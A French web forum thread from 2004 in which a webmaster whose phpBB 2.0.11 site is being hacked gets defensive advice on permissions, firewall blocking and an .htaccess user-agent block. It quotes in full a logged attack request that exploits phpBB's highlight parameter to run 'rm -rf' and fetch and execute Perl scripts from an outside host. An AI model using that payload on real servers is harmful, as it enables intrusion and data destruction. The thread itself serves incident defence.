Recif Posté 28 Décembre 2004 Posté 28 Décembre 2004 (modifié) Bonjour, quelqu'un sait si on peut protéger de la suppression et/ou de la modification les fichiers de tout un répèrtoire via .htaccess?? Steph Modifié 28 Décembre 2004 par Recif
Dan Posté 28 Décembre 2004 Posté 28 Décembre 2004 Salut Steph, Le fichier .htaccess n'a pas cette vocation. Par contre, si tu as accès au shell Linux, tu peux changer les permissions sur les fichiers et répertoires concernés.
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 J'ai tous mes fichiers en CHMOD 444 et la nuit dernière tous ont été supprimés!... Comment les protéger autrement?...
Dan Posté 28 Décembre 2004 Posté 28 Décembre 2004 Pour éviter que des fichiers soient supprimés, il faut enlever les permissions d'écriture du répertoire qui les contient Mais ils ont été supprimés par qui/quoi ?
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 (modifié) J'ai le répertoire en CHMOD 545 La raison est que je me fais hacker violament mon site depuis une semaine et ce matin vers 2h00 c'était la totale : tous les fichiers de la racine supprimés. En général c'était d'autre fichiers modifiés pour soit empêcher l'accès au site, soit changer les valeurs d'un formulaire... J'ai installé sentinel 2.1.2 et j'ai une attaque env. toutes les 4/5mn Modifié 28 Décembre 2004 par Recif
Dan Posté 28 Décembre 2004 Posté 28 Décembre 2004 Tu as des forums phpBB sur le serveur ? Regardes si tu n'as pas des fichiers .txt dans les répertoires /tmp et /var/tmp Enlèves-les et changes le mode de /usr/bin/wget en 750 Je pense que pratiquement tous les serveurs dédiés ont subi des attaques ces derniers jours, le Hub aussi. J'ai refusé de servir plus de 200 000 pages depuis samedi. Ca fait pas mal d'attaques. On avait une tentative de hack par seconde, au plus fort du weekend.
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 En effet j'ai un phpbb. J'ai jetté un oeil et pas trouvé de fichiers txt Les attaques sont de type www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 quant au usr/bin/ Je n'ais pas d'accès (hébèrgement dédié)
Dan Posté 28 Décembre 2004 Posté 28 Décembre 2004 Quelle version de phpBB ? pas la dernière probablement ? Si tu as accès au firewall, il suffit de fermer l'accès au serveur filepack.superbr.org (si ton hébergeur le permet) Dans la négative, envoies un mot au support en demandant qu'ils le fassent. Joints-y une partie de tes logs pour justifier ta demande.
Dan Posté 28 Décembre 2004 Posté 28 Décembre 2004 Une chose... la ligne de l'attaque n'est pas complète. Peux-tu donner une ligne avec le UserAgent ? Je te donnerais une règle pour le fichier .htaccess.
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 Ok, voici le mail complet que j'ai d'un des derniers : X-Mailer: NukeSentinelT Message-Id: <E1CjLWW-0005Jf-00_AT_http5> Sender: <hyipfrance_AT_http1> Date: Tue, 28 Dec 2004 18:52:44 +0100 Date & Heure: 2004-12-28 18:52:42 IP Blockée: 64.62.172.228 Membre ID: Anonymous (1) Raison: Abuse-Script -------------------- Membre Agent: LWP::Simple/5.803 Requête tentée: www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 Référant de: none IP Cliente: none Adresse Décellée: 64.62.172.228 Port Décellé: 58861 MÉthode de la requête: GET -------------------- Who-Is pour cette IP OrgName: Hurricane Electric OrgID: HURC Address: 760 Mission Court City: Fremont StateProv: CA PostalCode: 94539 Country: US NetRange: 64.62.128.0 - 64.62.255.255 CIDR: 64.62.128.0/17 NetName: HURRICANE-4 NetHandle: NET-64-62-128-0-1 Parent: NET-64-0-0-0-0 NetType: Direct Allocation NameServer: NS1.HE.NET NameServer: NS2.HE.NET NameServer: NS3.HE.NET Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE RegDate: 2002-08-27 Updated: 2003-09-15 TechHandle: ZH17-ARIN TechName: Hurricane Electric TechPhone: +1-510-580-4100 TechEmail: hostmaster_AT_he.net OrgTechHandle: ZH17-ARIN OrgTechName: Hurricane Electric OrgTechPhone: +1-510-580-4100 OrgTechEmail: hostmaster_AT_he.net
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 Et la version phpbb : Module's Name: Forums Module's Version: 2.0.11 Module's Description: phpBB 2.0.11 port for PHP-Nuke License: GNU/GPL Author's Name: chatserv Author's Email: chatserv_AT_nukeresources.com tu crois que les attaques sont toutes parties de ce forum?
Recif Posté 28 Décembre 2004 Auteur Posté 28 Décembre 2004 Le problème c'est que c'est un hébergement mutualisé, je n'ais aucun accès à la config
Dan Posté 29 Décembre 2004 Posté 29 Décembre 2004 Salut Recif, Pratiquement toutes ces attaques viennent par l'outil LWP et ont donc toutes le user-agent "LWP::Simple" En général, la première requête de l'attaque vient avec le UserAgent "lwp-trivial". Il suffit donc de bloquer ces deux User-Agents dans un fichier .htaccess, comme ceci: RewriteEngine onRewriteCond %{HTTP_USER_AGENT} LWP::Simple [NC,OR]RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC]RewriteRule .* - [F] Tu devrais être débarrassé de ces attaques. Dan
Recif Posté 29 Décembre 2004 Auteur Posté 29 Décembre 2004 Ok, merci, je vais essayer ça. Sinon en phpbb je ne trouve pas de patch de sécurité pour la v2.0.11...
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant